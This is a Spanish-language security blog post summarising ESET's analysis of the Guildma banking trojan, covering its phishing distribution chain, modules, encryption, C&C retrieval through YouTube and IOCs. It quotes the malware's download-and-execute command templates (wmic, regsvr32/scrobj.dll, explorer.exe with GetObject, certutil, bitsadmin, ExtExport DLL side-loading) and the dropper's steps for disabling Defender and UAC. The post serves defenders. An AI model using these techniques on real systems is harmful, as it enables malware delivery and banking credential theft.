• Skip to main content
  • Skip to primary sidebar
  • Skip to footer
  • Inicio
  • Auditoría
  • Eventos
  • Formación
  • General
  • Malware
  • Vulnerabilidades
  • Un blog de

Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

You are here: Home / Malware / Actualización del malware Guildma: características y cómo funciona

Actualización del malware Guildma: características y cómo funciona

8 marzo, 2020 Por Raquel Gálvez Leave a Comment

El pasado año nos llegaban noticias de que desde principios de 2019 miles de usuarios habían sido víctimas del malware llamado Guildma, del cual hablaremos hoy en este post.

Este malware posee una herramienta de acceso remoto (RAT), spyware, capacidad de robo de contraseñas y actuación a modo de troyano bancario. En un principio su principal objetivo fueron usuarios y servicios localizados en Brasil, pero poco a poco su alcance se fue expandiendo a compañías como Netflix, Facebook, Amazon y Google Mail.

Este malware era distribuido a través de campañas de phishing llevadas a cabo por correo electrónico (pudiendo tratarse de facturas, invitaciones, etc.), tratándose de correos personalizados que se dirigían a las víctimas por su nombre. En estos correos se enlazaba un archivo ZIP que contenía el link malicioso. Cuando el usuario afectado abría este archivo, éste descargaba un archivo XSL malicioso que a su vez descargaba todos los módulos de Guildma y ejecutaba un cargador en su primera etapa, el cual incluía el resto de módulos del malware. Este último entonces se activaba y esperaba las órdenes del servidor de comando y control (C&C) para dar comienzo a las interacciones específicas con el usuario, como podía ser abrir el sitio web de uno de los servicios que había sido blanco del ataque.

En la siguiente imagen podemos observar el alcance e intensidad de las campañas de distribución del malware desde el inicio de su distribución. Se observa claramente la puesta en marcha de una campaña masiva en agosto de 2019, cuando se enviaban hasta 50.000 muestras al día; esta campaña duró casi dos meses.

Fuente de la imagen: ESET – WeLiveSecurity

Como casi todos los malwares con los que nos podemos encontrar actualmente, Guildma ha sido actualizado con potentes novedades en cuanto a su ejecución y técnicas de ataque. Así pues, a continuación explicaremos sus características y funcionamiento.

CARACTERÍSTICAS

Como se ha explicado anteriormente, Guildma es un troyano bancario latinoamericano que tiene como objetivo principal a entidades brasileñas. Además de afectar a instituciones financieras, Guildma también intenta hacerse con credenciales de correos electrónicos, tiendas online y servicios de streaming, y afecta al menos a diez veces más víctimas que cualquier otro troyano latinoamericano de esta familia analizado hasta el momento. Usa métodos innovadores de ejecución así como técnicas de ataques sofisticadas.

A diferencia de otros troyanos latinoamericanos. Guildma no almacena las ventanas emergentes falsas usadas en el binario. En su lugar, el ataque se lleva a cabo a través del servidor C&C. Esto da a los creadores del malware mayor flexibilidad para reaccionar a las contramedidas implementadas por las entidades bancarias víctimas del ataque.

Guildma tiene implementadas las siguientes funcionalidades como puerta trasera:

  • Hacer capturas de pantalla
  • Capturar las pulsaciones del teclado
  • Simular teclado y ratón
  • Bloquear atajos (por ejemplo, deshabilita la combinación de teclas Alt+F4 para que así sea más difícil cerrar la ventana emergente cuando ésta aparezca en pantalla)
  • Descargar y ejecutar archivos
  • Reiniciar el dispositivo

CÓMO FUNCIONA

Guildma funciona por módulos. Cuando los investigadores de ESET escribieron el artículo del que se nutre la información aquí proporcionada, el malware estaba constituido por 10 módulos, sin incluir las etapas de distribución en cadena.

EVOLUCIÓN DE LAS CADENAS DE DISTRIBUCIÓN

Guildma se distribuye a través de mensajes de spam que incluyen archivos maliciosos. A continuación se pueden observar algunos de estos mensajes escritos en portugués:

Una de las características que distingue la forma de distribución de Guildma en cadena es el uso de herramientas que están presentes en el sistema del dispositivo infectado, haciéndolo normalmente de forma novedosa y poco corriente. Otra de sus características es la reutilización de técnicas; si bien es cierto que se añaden nuevas técnicas de vez en cuando, la mayoría de las veces los desarrolladores parece que simplemente reutilizan las de versiones anteriores.

Distribución de Guildma

En la imagen anterior vemos la distribución en cadena de la versión 150 del malware; la estructura de distribución es bastante dinámica. Por ejemplo, en versiones anteriores el archivo malicioso LNK que observamos en la imagen no estaba dentro del archivo ZIP, ni tampoco se utilizaba un archivo SFX RAR que contuviese un instalador MSI. De igual forma, solía haber una etapa JScript cuyo único propósito era descargar y ejecutar la etapa final JScript.

TÉCNICAS MÁS LLAMATIVAS USADAS EN LOS ÚLTIMOS 14 MESES

Ejecución de la etapa JScript

A finales de 2018, Guildma escondía su código en archivos «extensible Stylesheet Language (.xsl)» y usaba wmic.exe para descargarlos y ejecutarlos:

wmic.exe /format:”<URL>”

Por un breve periodo de tiempo pasó a usar regsvr32.exe y scrobj.dll para descargar un objeto COM con JScript implementado y ejecutaba su registro rutinario (el cual contenía el código malicioso):

regsvr32.exe /s /n /u /i:<URL> scrobj.dll

Más recientemente, los desarrolladores del malware empezaron a hacer uso de Windows Explorer para ejecutar la etapa de JScript. Este ataque se apoya en el hecho de que Windows Explorer tratará de abrir cualquier archivo que se le pase a través de la línea de comandos con el programa asociado correspondiente, así como también se aprovecha de que la asociación por defecto de los archivos .js es «Microsoft Windows Script Host«. El script que se le proporciona a Windows Explorer es un comando único cuyo propósito es descargar y ejecutar la etapa JScript:

echo GetObject(‘script:<URL>’) > <file>.js | explorer.exe <random switches> <file>.js

Ejecución de los módulos del binario

En sus inicios, Guildma hacía uso de aswRunDll.exe (de Avast) para dar comienzo a la primera etapa del binario, y de regsvr32.exe como respaldo para los casos en los que los productos de Avast no estuviesen instalados en el dispositivo infectado. Posteriormente los desarrolladores cesaron el uso de aswRunDll.exe, dejando a regsvr32.exe como el único método de ejecución. Después de un breve periodo de tiempo usando rundll32.exe, los desarrolladores de Guildma empezaron a utilizar el método de ejecución actual: ExtExport.exe.

ExtExport.exe es un componente de Microsoft Internet Explorer sobre el que no hay documentación, usado para exportar marcadores de Mozilla Firefox y 360 Secure, y puede ser utilizado de manera dañina por DLL Side-Loading (Carga lateral de archivos DLL). Cuando el comando que aparece a continuación se ejecuta, mozcrt19.dll, mozsqlite3.dll y sqlite3.dll se cargan en la carpeta especificada en la línea de comando:

C:\Program Files\Internet Explorer\ExtExport.exe <folder> <dummy 1> <dummy 2>

Para hacer un uso malicioso de esto, normalmente habría que cargar la DLL como uno de los archivos mencionados anteriormente; en el caso de Guildma se usan los tres.

Descarga de los módulos del binario

La primera versión de Guildma usaba certutil.exe y lo copiaba en certis.exe (aparentemente para evadir su detección):

certis.exe -urlcache -split -f “<URL>” “<destination path>”

Los desarrolladores luego cambiaron a BITSAdmin (la herramienta de administración Microsoft Background Intelligent Transfer Service) y todavía lo siguen usando:

bitsadmin.exe /transfer <random number> /priority foreground <URL> <destination>

Durante un par de meses los módulos del binario fueron codificados en base64 y su proveedor hosting fue Google Cloud. En ese momento, Guildma usaba tanto BITSAdmin como certutil (el primero para descargar los módulos y el segundo para decodificarlos).

Otros cambios de interés

Guildma utiliza variables y nombres de funciones extraños y poco descriptivos. A pesar de que estos nombres no tienen sentido, se puede apreciar que son creación de una persona (por ejemplo, «radador» para la función de número aleatorio o «Bxaki» para la función de descarga). En 2019 todos estos nombres se cambiaron por palabras aleatorias (por ejemplo, «bx021» y «mrc430»). Los investigadores de ESET tenían la sospecha de que los desarrolladores del malware pudieran estar haciendo uso de una herramienta de ofuscación automática, pero finalmente concluyeron que no parece ser el caso, ya que este cambio solo ocurrió en esa ocasión y los nombres han permanecido así desde entonces.

Un añadido relativamente nuevo es la técnica ya bastante conocida ADS (Alternate Data Streams) para almacenar los módulos del binario. Todos los módulos ahora se almacenan como ADS de un archivo único (por ejemplo, “desktop.ini:nauwuygiaa.jpg”, “desktop.ini:nauwuygiab.jpg”, etc.).

HISTÓRICO DE VERSIONES

Aparentemente, el malware Guildma cuenta con un gran número de versiones desarrolladas por los atacantes, a pesar de que los cambios y avances entre unas y otras eran escasos (debido a una arquitectura inadecuada, la cual incluía valores de configuración en el código, la mayor parte de los desarrolladores tienen que recompilar todos los binarios en cada campaña). Este trabajo no ha sido totalmente automatizado, ya que normalmente existe un retraso considerable entre la actualización del número de versión en los scripts y los de los binarios.

En el artículo de ESET se recogen 150 versiones, pero en el momento de publicarse ya existían otras dos. Los cambios entre ellas, como se ha mencionado, no son considerables en cuanto a funcionalidad o distribución.

La etapa final de la distribución en cadena en la cual se incluye el número de la versión parece haber sido sustituida de manera permanente con los caracteres «xXx» desde la versión 148.

Aquí se puede encontrar un listado de todas (o casi todas) las versiones de Guildma.

RESUMEN DE LOS MÓDULOS

La estructura de los módulos de Guildma parece ser bastante constante. Todos los módulos están compuestos de un prefijo compartido que depende de la versión del malware, y un sufijo específico para cada módulo. En la siguiente tabla se pueden observar algunos ejemplos. La primera columna es el nombre de archivo de la URL, la segunda columna contiene el nombre de los archivos en el sistema, y la tercera columna se corresponde con el módulo.

A excepción del módulo de carga principal 1 (64.~) y el módulo de inyección principal (xa.gif, *xb.gif y *xc.gif), todos los módulos son cifrados con un método simple de cifrado XOR usando una clave de 32 byte. La clave se genera a partir de una «semilla» de 32 bit usando el algoritmo mostrado en la siguiente imagen. El valor de dicha semilla se ofusca en los binarios para evitar que se produzca una extracción poco compleja.

Fuente de la imagen: ESET – WeLiveSecurity

Son tres los módulos que se comunican con el C&C: el módulo principal, el módulo RAT, y el usado para robar contactos y datos de formulario. La comunicación se hace a través de HTTP(S) usando una combinación de base64 y varias formas sencillas y personalizadas de algoritmos de cifrado para evitar que los datos sean transferidos.

En la siguiente sección se explica cómo se obtiene la dirección del C&C.

Módulo de carga principal (*64.~)

Esta es la primera etapa binaria de la cadena. El archivo es una DLL descargada en dos partes, las cuales son concatenadas por la etapa anterior JScript. Se cargan los tres archivos para dar lugar al cargador de la siguiente etapa (*xa.gif, *xb.gif y *xc.gif), se concatenan, se añade el archivo PE resultante a su propia dirección y se ejecuta dicho archivo.

La carga de un archivo PE es relativamente compleja, por lo que para ello los desarrolladores del malware usaron la librería de código abierto BTMemoryModule.

Método principal de inyección (*xa.gif + *xb.gif + *xc.gif)

Este módulo da comienzo a la siguiente etapa (*gx.gif) desde el disco y lo descifra. Luego, ejecuta el primer archivo ejecutable existente de los mencionados en la siguiente lista e inyecta en el susodicho el payload ya descifrado.

  • C:\Program Files\AVAST Software\Avast\aswRunDll.exe
  • C:\Program Files\Diebold\Warsaw\unins000.exe *
  • C:\Windows\SysWOW64\userinit.exe
  • C:\Windows\System32\userinit.

Se trata de una aplicación popular en Brasil para conseguir un acceso seguro vía online a las entidades bancarias.

Módulo principal (*g.gif)

El módulo principal de Guildma organiza el resto de módulos. Su implementación es menos compleja de lo que parece, ya que usa un gran números de temporizadores y eventos, pero su funcionalidad es en realidad relativamente simple. Contiene código antiguo que ya no está siendo utilizado así como código de la etapa de preproducción que no ha sido usado aún.

Al ser cargado, este módulo comprueba si está siendo ejecutado en un entorno sandbox (para ello examina, por ejemplo, el nombre del dispositivo y el ID del volumen del disco), si hay otros procesos como él mismo ejecutándose (es decir, si el mismo módulo se está ejecutando dos veces) y si el lenguaje del sistema es o no portugués. Si alguna de estas comprobaciones revela que el sistema es de poco interés o ya está infectado por Guildma, el propio malware pone fin a su ejecución.

En caso contrario, el módulo recoge información del sistema (nombre del ordenador, qué software de seguridad está siendo utilizado, los programas instalados, etc.) y establece contacto con el C&C. Luego comienza a monitorizar procesos que pueden ser de interés, principalmente cuando ciertas aplicaciones son ejecutadas o se accede a páginas web de bancos, y se llevan a cabo las acciones pertinentes (por ejemplo, hacer capturas de pantalla, evitar que el usuario cierre la ventana al dificultar los atajos mediante teclado, iniciar el módulo RAT, etc.).

Este módulo también implementa comandos de puerta trasera cuya funcionalidad se pisa con la del módulo RAT casi en su totalidad.

Captador de formularios y de robo de contactos (*c.jpg)

Este módulo tiene dos funciones: recolectar direcciones de email y datos de formulario de los sitios web. Lleva a cabo la descarga y ejecuta las funcionalidades del malware, puede hacer capturas de pantalla, simular un teclado y un ratón, y reiniciar el ordenador.

La mayoría de troyanos bancarios latinoamericanos muestran ventanas emergentes falsas basadas en la monitorización de los nombres de las ventanas abiertas. Estas ventanas normalmente se almacenan en el binario. Los investigadores de ESET no encontraron código en Guildma, pero parece ser que el RAT contiene un formulario Delphi que implementa un navegador web simple. Dado que también se ejecuta en base al nombre de las ventanas activas, se piensa que el formulario es utilizado para mostrar cuadros de diálogo falsos al usuario.

MailPassView (a.jpg) y BrowserPassView (b.jpg)

Se trata de herramientas gratuitas de Nirsoft para extraer las credenciales guardadas de clientes de email conocidos y de navegadores web, respectivamente. Desde que Nirsoft dejase de dar soporte a operaciones de bajo perfil de las nuevas versiones para así frenar el abuso de estas herramientas por los desarrolladores de malware, quienes crearon Guildma están usando ahora versiones más antiguas que sí tienen las características que necesitan.

Módulo dropper JScript (*i.gif)

Este módulo ejecuta (usando cscript.exe) un archivo JScript. El script consta de dos partes: la primera parte se almacena en una larga cadena codificada, mientras que la segunda parte se monta a partir de muchas cadenas pequeñas (algunas cifradas y otras no). Cabe mencionar que las cadenas del archivo JScript son cifradas por este módulo con una clave generada de manera aleatoria, por lo que se ven de manera clara en el dropper.

El script ejecuta las siguientes acciones:

  • Deshabilita el UAC
  • Deshabilita la comprobación de la firma de los archivos EXE
  • Deshabilita Windows Defender
  • Crea una regla de firewall para deshabilitar el acceso a la red de C:\Program Files\AVAST Software\Avast\Setup\avast.setup
  • Deshabilita el driver wsddntf (Diebold Warsaw GAS Tecnologia – el software de protección de acceso a los bancos)
  • Añade una excepción al firewall para los archivos usados como objetivo de la inyección:
    • C:\Program Files\Diebold\Warsaw\unins000.exe
    • C:\Program Files\AVAST Software\Avast\aswRunDll.exe

Se cree que este módulo todavía se encuentra en proceso de desarrollo ya que los investigadores de ESET no observaron en ningún momento la acción del dropper.

NUEVOS DESARROLLOS (DESDE MEDIADOS DE 2019)

Nueva recuperación del C&C

En la versión 142, una nueva forma de distribuir los servidores C&C, mediante el uso de YouTube y perfiles de Facebook, fue implementada. Sin embargo, los desarrolladores del malware dejaron de usar Facebook de manera casi inmediata y, en el momento de la publicación de la investigación de ESET, hacían uso total de YouTube (Guildma pone la información en la descripción del canal, sin ofuscarla, por ejemplo, en la URL como hacía Casbaneiro). El inicio y el final de las direcciones de C&C cifradas se delimitan con «|||». La información que queda entre esos caracteres está codificada en base64 y el método de cifrado es el algoritmo de Mispadu. Este es el método principal de recuperación del C&C; el método antiguo también sigue estando presente en caso de que el nuevo falle.

Módulos añadidos y eliminados

El módulo dropper de JScript descrito en uno de los apartados anteriores fue añadido en la versión 145. En cambio, en la versión 139, Guildma dejó de usar dos módulos presentes en versiones anteriores (el módulo de envío de correos masivos (f.jpg) y su módulo de carga (e.jpg)). En algunas de las versiones siguientes, todavía se podía acceder a estos módulos a través de los nombres esperados (e.jpg y f.jpg) del mismo servidor en el que se encuentran el resto de módulos. Esto lleva a pensar que estos módulos todavía siguen siendo desarrollados, pero que actualmente se distribuyen según se necesitan, posiblemente usando los comandos de descarga y de ejecución de puerta trasera.

Nuevo cifrado de cadenas

El módulo dropper de JScript trajo consigo un nuevo algoritmo de cifrado. Una variante de este algoritmo (la cual se puede observar en la siguiente imagen) se distribuyó entre el resto de módulos de la versión 147.

Variante del algoritmo de cifrado

En sus inicios Guildma estaba utilizando el mismo cifrado de cadenas que Casbaneiro. El nuevo algoritmo tiene cuatro etapas y, como se puede observar, el algoritmo de cifrado inicial se sigue usando en la primera etapa. También cabe destacar que, asimismo, el algoritmo de cifrado de Mispadu está siendo usado en la cuarta etapa.

En la versión 148, Guildma implementó una tabla de cadenas; todas las cadenas son descifradas al principio de la ejecución y se accede a ellas a través de la tabla cuando es necesario.

Eliminación de blancos internacionales

En la versión 138 Guildma añadió a su lista de objetivos a instituciones internacionales (principalmente bancos) fuera de Brasil. A pesar de esto, se ha observado que no se han llevado a cabo campañas internacionales; las campañas con archivos en infraestructuras de Cloudflare llegaron al punto de incluso bloquear la descarga de archivos desde direcciones IP que no fuesen brasileñas. De hecho, en los últimos 14 meses no se han observado campañas contra objetivos fuera de Brasil.

Finalmente, en la versión 145 la capacidad de establecer como objetivos a instituciones fuera de Brasil se eliminó totalmente. Teniendo todo esto en cuenta, se cree que esta funcionalidad fue algo que estaba en desarrollo y que terminó por ser desestimada.

CONCLUSIONES

El malware Guildma muestra las características principales de los troyanos bancarios latinoamericanos. Está escrito en Delphi, tiene como objetivo principal a Latinoamérica, implementa funcionalidades de puerta trasera, se divide en módulos y hace uso de herramientas legítimas.

Guildma también comparte puntos interesantes con otras familias de malware. Uno de estos puntos de interés compartidos es su algoritmo de cifrado actual, el cual combina aquellos usados por Casbaneiro y Mispadu.

IOCs

Hashes (SHA-1, descripción y nombre de detección de ESET, respectivamente)

Nombres de archivos: C:\Users\Public\Libraries\qlanl*

Enlaces de arranque

  • Localización: %APPDATA%\Microsoft\Programs\StartUp\reiast%USERNAME%%COMPUTERNAME%.lnk
  • Objetivos:
    • C:\Program Files (x86)\Internet Explorer\ExtExport.exe
    • C:\Program Files\Internet Explorer\ExtExport.exe
  • Args: <install dir> <rand> <rand> (where <rand> is a random, 5 to 9 character long string generated from the alphabet qwertyuiop1lgfdsas2dfghj3zcvbnmm)
  • Servidores C&C:
    • https://www.zvatrswtsrw[.]ml
    • https://xskcjzamlkxwo[.]gq
    • https://www.vhguyeu[.]ml
    • https://www.carnataldez[.]ml
    • https://www.movbmog[.]ga
    • https://iuiuytrytrewrqw[.]gq
    • https://www.gucinowertr[.]tk
    • https://equilibrios[.]ga
    • https://www.clooinfor[.]cf
    • https://ambirsr[.]tk
    • https://dbuhcbudyu[.]tk
    • https://nvfjvtntt[.]cf
    • http://whia7g.acquafufheirybveru[.]online

En el informe de ESET también pueden ser encontradas las técnicas de ataque.

Más información:

Guildma: The Devil drives electric
https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/

Guildma, el malware que está acechando a 130 bancos
https://www.tynmagazine.com/guildma-el-malware-que-esta-acechando-a-130-bancos/

Compártelo:

  • Twitter
  • Facebook
  • LinkedIn
  • Reddit
  • Telegram
  • WhatsApp

Publicaciones relacionadas

Filed Under: Malware Tagged With: guildma, malware, RAT, trojan

Reader Interactions

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Primary Sidebar

Buscador

Email Newsletter

Suscríbase y reciba Una al Día en su correo.

UADCAST

Populares de UAD

  • Ejecución Remota de Código en los servidores de Microsoft Office 365 sin resolver
  • Bitdefender publica un descifrador gratuito para el ransomware Darkside
  • Detectado un nuevo troyano bancario para Android
  • Actualización de Nvidia corrige vulnerabilidad crítica
  • Fallos críticos en la pila TCP/IP afectan a millones de dispositivos IoT

Entradas recientes

  • El Banco de la Reserva de Nueva Zelanda sufre una filtración de datos críticos
  • Ejecución Remota de Código en los servidores de Microsoft Office 365 sin resolver
  • Actualización de Nvidia corrige vulnerabilidad crítica
  • Bitdefender publica un descifrador gratuito para el ransomware Darkside
  • Detectado un nuevo troyano bancario para Android
  • El FBI, CISA, NSA acusan a Rusia del ciberataque a SolarWinds
  • Fallos críticos en la pila TCP/IP afectan a millones de dispositivos IoT
  • Correo electrónico
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Footer

Una al Día

Una-al-día nació a raíz de un inocente comentario en un canal IRC hace casi 19 años. A través de los archivos, un lector curioso puede ver cómo ha cambiado (o no) la seguridad de la información desde entonces.

Entradas recientes

  • El Banco de la Reserva de Nueva Zelanda sufre una filtración de datos críticos
  • Ejecución Remota de Código en los servidores de Microsoft Office 365 sin resolver
  • Actualización de Nvidia corrige vulnerabilidad crítica
  • Bitdefender publica un descifrador gratuito para el ransomware Darkside
  • Detectado un nuevo troyano bancario para Android

Etiquetas

#bugbounty #ddos #sphinx 0-day 0-zay 0day 0v1ru$ 2FA 4g 5g 10kblaze 888 RAT account hijack ace acrobat acrobat reader actualizacion Actualización actualizar adb address bar AdMaxim Adobe Adobe Bridge Adware Afeter Effects Agencia Tributaria agoda Alemania Alexa Alien Aliznet alphabet Amadeus Amazingco Amazon amd among us Anatova Andr/Xgen2-CY Android Android lowcost androMut AngryPolarBearBug2 anonymous antivirus any.run apache api apk app Apple apps APT apt-c-23 apt39 APT41 apt framework Aptoide apuestas archive_tar arp asp asus ata ataque Atlantis ATP attack Audio Australia autenticación Authentication bypass autodesk avaddon avira azure backdoor Baltimore ban bancario bancos bandook bank banker barra navegacion base de datos BBC BGP BIG-IP bill gates binary defense binaryedge bing biometrica biometría bios bird bitbucket bitcoin bitdefender blackhat bladabindi BLE bleedingtooth BLESA blink blockchain bluekeep blueleaks Bluetooth Bluetooth Low Energy bluez boca bof boletín booking bootstrap-sass borrado bot botnet bots breach brecha Brikerbot british airways bruteforce BSD bsides buffer overflow Bug Bug bounty bugbounty Bulgaria bypass C&C C2C camaras seguridad cambridge camera Campaign canada cannabis canon capcom car carbanak carding ccleaner cctv CDN CDRThief cem censura centurylink cerberus Certifados certificacion Certificates challenge Checkers checkpoint Check Point China chingari Chrome chromium CI Ciberataque Cibercrimen ciber delincuentes ciberdelincuentes ciberespionaje ciberguerra ciberseguridad cifrado Cisco Citrix clave privada cloud CloudCMS cloudfare cmd cms cng.sys code execution CoderWare coinhive ColdFusion comrat conferencia confidencial congreso congresos conti contraseñas Cookies copy-on-write Corea del Norte coronavirus covid Covid19 cow cpu Crack Credential-Stuffing CriptoCert criptografía criptomoneda Criptomonedas criptored critical Cross-Site Request Forgery CrowdStrike crypt32 cryptojacking Cryptolocker cryptominado cryptomonedas críticas CSP CSRF ctf customer support cve CVE-202-6109 CVE-2015-4670 CVE-2017-0199 CVE-2019-1619 CVE-2019-1620 CVE-2019-2633 CVE-2019-2638 CVE-2019-2725 CVE-2019-3719 CVE-2019-5096 CVE-2019-5544 CVE-2019-7838 CVE-2019-7839 CVE-2019-7840 CVE-2019-7845 CVE-2019-7850 CVE-2019-11043 CVE-2019-11510 CVE-2019-11707 CVE-2019-11932 CVE-2019-12268 CVE-2019-12592 cve-2019-12815 CVE-2019-12922 CVE-2019-14287 CVE-2019-14899 CVE-2019-15126 CVE-2019-15295 CVE-2019-15316 CVE-2019-16928 cve-2019-19519 cve-2019-19520 cve-2019-19521 CVE-2019-19522 CVE-2019-19639 CVE-2019-19743 CVE-2019-19781 CVE-2019–11396 CVE-2020-0601 CVE-2020-0796 CVE-2020-0915 CVE-2020-0916 CVE-2020-0986 cve-2020-13-50 CVE-2020-724 CVE-2020-1206 cve-2020-1530 cve-2020-1537 CVE-2020-2765 CVE-2020-3142 CVE-2020-3566 CVE-2020-3764 CVE-2020-3952 CVE-2020-3953 CVE-2020-3954 CVE-2020-3956 CVE-2020-6008 CVE-2020-6009 CVE-2020-6010 CVE-2020-6110 CVE-2020-7473 CVE-2020-8419 CVE-2020-8420\ CVE-2020-8421 cve-2020-8982 CVE-2020-8983 CVE-2020-10148 CVE-2020-11511 CVE-2020-11651 CVE-2020-12351 CVE-2020-12352 CVE-2020-14750 CVE-2020-15466 CVE-2020-25212 CVE-2020-25645 cve-2020-29491 cve-2020-29492 CVE-2021-1051 cvss CyberArk cyberataque cyberattack cylance CyrusOne código arbitrario D-Link DarkHotel darkirc dark markets darknet darkside dark web darkweb darpa DART Database data breach Data Center Network Manager data leak dataspii DB DCNM ddos ddosecrets Debian decrypter deepfake deep web defacement defcon defender defiant Dell Dell System Detect dell wyse demanda denegacion de servicio Denegación de servicio Denial of Service dereferencing devfest DHS digilocker digitalocean DigitalRevolution directory traversal disclosure discord Dispositivos IoT django Django Rest Framework DJI DNS DNS over HTTPS docker dockerhub dogecoin DoH doki dolphin dolphinattack donald trump Doogee BL7000 doorbell dos DoubleGun downgrade DrayTek drivers droga dropper drupal duplicado SIM duplicator DVMRP E-Business e-learning EA echobot ecommerce ecsc EDA Edge EEUU ejecución de código ejecución de código arbitrario ekans ElasticSearch elecciones electronica elevacion de privilegios Elevación de privilegios elon musk emotet empire enisa ergegor eris loris error escalada escalada de privilegios ESET ESNI españa estados unidos Estafa esteganografia eternalblue Europa europol eventbot evento eventos Evernote Evernote Web Clipper evilcorp evilgnome Evilnum EvilQuest excel exim Experience Manager exploit extension extorsión exxpedia F5 faceapp Facebook Facebook Messenger FakeSpy fallos fallout fancy bear Fast Flux fbi fifa20 Filtración fingerprint finspy Firebase FireEye firefox Firefox Private Network Firefox Test Pilot Flash Player FlawedAmmy flipboard foreshadow formacion Forminator foros FOSSA fotos foxit pdf fpga Framemaker framework fraud Fraude FSB ftc FTP fuerza bruta Fuga de información Fusion gadget GandCrab garmin gdg gdpr gehealtcare gem GHIDRA gif git github gmail go GoAhead godaddy golang goldbrute goldenspy Google Google Analytics google app engine google chrome Google Docs Google Hangouts google nest googleplay google play Google Titan gosms gosmspro goznym gpu Grandoreiro grandstream graph great firewall gsm guacamole guildma hack hackeo hacker hacking hacktivist hardware hash Heartbleed HEVC hiberus Hijacking hisilicon hispasec historia honda hospital hostinger hotelbeds hoteles hotels http httpd HTTPS huawei Hyper-V hyperv iBaby iBaby Monitor M6S IBM ICAR iCloud ico ie IGMP ilegal iLnkP2P iMessage impresoras india infection infinite loop Infiniti NCAR infosec injection innerSloth insider instagram intel intelligence Internet Explorer intezer labs in the wild Investigación Inyeción SQL IOC iomega iOS IOS XR iot iPad ipados iPhone iPod ipp iran isp Italia iterm2 ITG18 jabber jailbreak java javascript Jenkis JMT Trader joker joomla joomla! jquery js kaiji Karkoff karpersky kaspersky kde kde plasma Keecoo P11 keepass kernel Kernel Linux keyless keylogger kill-switch Koodous Kr00k krebsonsecurity kubeflow kubernete kubernetes la 9 las vegas latinoamerica Lazarus leak LearnDash LearnPress lenovo Let'sEncrypt ley lfi LG libreoffice libssh licencias LifterLMS Line LinkedIn Linknat linux linux kernel liquid LMS loader lockbit logitech longwatch lte luisiana Lukas Stefanko lxc M-Horse Pure 1 Maas mac machete mac os MacOS macros magecart magento Mail malaga malspam malvertising malware malware macos apple Manipulación de ficheros market martes martes de parches marzo masmovil MATA matrix maze mdm mds Media Encoder Media File Jacking MediaTek medicina meldown meltdown MEMS menor mensajería instantánea meow MessageTap messenger metasploit Mi Browser Microsoft Microsoft Edge microsoft excel Microsoft Teams Microsoft Word mijia mikrotik minero mining Mint Browser mirai mit mitre mitron mobileiron modsecurity mod_copy monero MongoDB monitor Moodle MosaicRegressos Motorola mousejack Mozart Mozilla MQTT MSTIC ms word mukashi mySQL móvil NAC Nagios NanocoreRAT nas Navegador Tor nbip nca Nessus netcat Netgear Netlab360 netwalker NetWeaver NeverQuest nginx Nintendo nissan Nissan ASIST NjRAT Nnissan connect things nordvpn NOTROBIN npm nsa NSACrypt NVIDIA ObjectInjection Obsolescencia programada oceanlotus OFAC Office office 365 oilrig okcupid omnibees omnirat OneDrive onion ONO ONTSI OpenBSD OpenOffice opensouthcode OpenSSH OpenSSL openSuSE openwrt Opera Oracle origin orion oscomerce osi OS X OTRS outlok Outlook overflow owasp p30 package manager Paloalto parche parches password password checkup Passwords paswords Patch Tuesday path transversal Path Traversal patrón Payday paypal pear pegasus pewdiepie PhantomNet Pharming Phishing phising Photoshop PHP php-fpm phpmyadmin Picreel piercer pila bluetooth PirateMatryoshka Pixel Play Store plugin Plugins plutotv Poc pod policia policykit policía polkit porn portabilidad PoS PostgreSQL powershell ppp Predator the Thief prensa Privacidad privacy privadas privesc privilege escalation privilegios ProCC ProffPoint proftpd Project Zero Promethium prosegur proxy prueba de concepto psg PsiXBot ptp puerto rico Pulse Secure pulsesecure putty pwn Pwn2Own PyRAT python python3 python 3.8.0 PyVil Qakbot Qbot QNAP QSnatch qualcomm QuickTime quora raas ragnar ragnar locker Ramsay Healt Care RAM scraping ramsonware rana rankmatch ransom ransomware rapid7 RAT RATs ratsnif razer rce rconfig rdp RDS recaptcha reconocimiento facial red.es redes Red Hat red team relay Release relleno de contraseñas remote remote code execution Reporte retpoline retrohuinting revelación de información sensible RevengeHotels RevengeRAT reversing reversinglabs REvil Revocation ReVoLTE Rich Mirch rick-rolling rick astley ridl ring riot robo datos robo de cuenta robo de información root Rooted router routeros ruby RubyGems rumania Rusia rutas ryuk sack panic safari safe mode safety detective salto de restricciones saltstack SAML samsung sandbox SandboxEscaper Sangfor sap scam Secuestro SIM security security bypass Security Discovery Security Patch security update segmentation fault seguridad seguridad física selinux server servidor web sextorción sextorsion sha-1 ShadowPad SHAREit SHAttered Shell ShinyHunters shodan side-channel sigred Silence Silex Silkkitie sim simswapping SIM Swapping siri sistema interno Site Isolation skills skimming skype slack Smanager Smartbuilding Smartphone smartwa Smartwatch smb SMBGhost SMBleed smbv3 smishing sms SMTPD snake snapd Snatch SNI sodin Sodinokibi software libre Solarwinds Solorigate sop sophos source code SourceFourge spam Spearphone spectre speculative spoofing spotify Spy spyware SQL SQL injection Squid ssh ssid ssl ssltrip ssrf stack overflow Stanislav steal stealer steam stop ransomware strandhogg strongpity studio code sudo suecia Sumbrust supercomputador SupportAssist surfingattack symantec symbotic SymCrypt sysinternals SysTech ta505 takeover talleres tarjetas Tarjetas de crédito tchap TCP/IP tcp sack teclado tecnología Telecom Telegram teletrabajo tenyearchallenge tesla tesoro The Community ThemeGrill The North Face thin client ThinOS Thoth thunderbird Thunderbolt ThunderSpy Tianfu Cup ticketmaster tiktok timbre timing attack Titan M Titan Security Key tls TMUI tmux Tokopedia tomcat tonedeaf tool TOR Tor Browser torbrowser Torisma torpedo TP-Link TraceTogether Trassion Treck Triada trickbot trojan TroubleGrabber troyano TrueBot trusteer rapport turlaapt tvOS twiiter Twitter typosquatting uad uad360 uad360 congreso malaga uam uber ubuntu UEFI ultrasonido uma unaalmes unauthorized access UNC Under the Breach unifying universidad unix Update updates url ursniff use-after-free user-after-free v8 valorant valuevault valve vault 7 vbulletin VictoryGate videocamaras videoportero videos vietnam vim virus virustotal visa vishing Visual Studio VKworld Mix Plus vlc vmware VMware Cloud Foundation VMware ESXi vnc voice assistants voip VOS2009 VOS3000 voto vpn vt vulnera vulnerabilidad vulnerabilidades vulnerability Wacom waf wallet Wall Street Market 